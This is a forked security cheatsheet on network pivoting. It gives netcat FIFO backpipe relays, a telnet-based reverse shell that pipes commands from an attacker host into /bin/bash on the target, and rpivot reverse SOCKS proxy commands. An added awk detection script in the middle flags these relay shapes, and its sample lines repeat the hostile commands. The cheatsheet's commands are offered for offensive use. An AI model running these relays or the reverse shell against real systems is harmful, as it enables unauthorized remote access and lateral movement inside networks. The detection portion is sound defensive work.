forked from andrewjkerr/security-cheatsheets
pivoting
# alex <alexbujduveanu>
# snifer <sniferl4bs>
# To make a FIFO in the file system
mknod [name of file] p
# Pivoting with a backpipe #
# On the attacker:
nc [pivot host] 4444
# On the pivot host
nc localhost 80 <[FIFO file name] | nc -l -p 4444 >[FIFO file name]
# Telnet variant (when netcat is not available on the target) #
# Listen on port 80 in terminal 1 on the attack machine
nc -l -n -v -p 80
# Listen on port 443 in terminal 2 on the attack machine
nc -l -n -v -p 443
# On the target machine:
telnet [attack host] 80 | /bin/bash | telnet [attack host] 443
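
For detection, the backpipe and telnet relays above both have a recognisable command-line shape. The script below is an added example, not part of the original cheatsheet: it labels command lines taken from process auditing, and the function names, labels and sample lines (using 192.0.2.0/24 documentation addresses) are constructed assumptions.

```shell
#!/bin/sh
# Added detection example (not from the cheatsheet): label one shell command
# line by the relay shape it matches. Labels and function names are assumptions.
classify_cmdline() {
    printf '%s\n' "$1" | awk '
    # File named after redirect operator op ("<" or ">") in one pipeline stage.
    function target(stage, op,    t) {
        if (!match(stage, op "[ \t]*[^ \t<>&|]+")) return ""
        t = substr(stage, RSTART + 1, RLENGTH - 1)
        sub(/^[ \t]+/, "", t)
        return t
    }
    function is_net(s)   { return s ~ /(^|[ \t]|\/)(nc|ncat|netcat)([ \t]|$)/ }
    function is_shell(s) { return s ~ /^[ \t]*(\/[^ \t]*\/)?(sh|bash|dash|zsh|ksh)([ \t]|$)/ }
    {
        n = split($0, st, "|"); label = "none"
        for (i = 1; i <= n; i++) {
            # telnet | shell | telnet: commands in on one socket, output on another
            if (i + 2 <= n && st[i] ~ /telnet/ && is_shell(st[i+1]) && st[i+2] ~ /telnet/)
                label = "telnet-shell-relay"
            # netcat stage reads a file that a later netcat stage writes: backpipe
            f = target(st[i], "<")
            for (j = i + 1; f != "" && j <= n; j++)
                if (is_net(st[i]) && is_net(st[j]) && target(st[j], ">") == f)
                    label = "fifo-backpipe"
        }
        print label
    }'
}

# Constructed command lines standing in for process-audit records (not real telemetry).
sample_cmdlines() {
    cat <<'EOF'
nc localhost 80 <backpipe | nc -l -p 4444 >backpipe
nc -l -p 4444 0<bp | nc localhost 80 1>bp
telnet 192.0.2.10 80 | /bin/bash | telnet 192.0.2.10 443
sort <users.txt | uniq >users.txt
nc -z -v 192.0.2.20 22
EOF
}

# Print "label<TAB>command line" for every record on stdin.
scan() {
    while IFS= read -r line; do
        printf '%s\t%s\n' "$(classify_cmdline "$line")" "$line"
    done
}

sample_cmdlines | scan
```

The shared-file check requires netcat on both sides of the pipe, so the `sort <users.txt | uniq >users.txt` idiom and a plain port probe are not flagged.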
# Rpivot is a reverse SOCKS proxy tool that lets you tunnel traffic through a SOCKS proxy
# Server side
python server.py --proxy-port 1080 --server-port 9999 --server-ip 0.0.0.0
# Client side
python client.py --server-ip <ip> --server-port 9999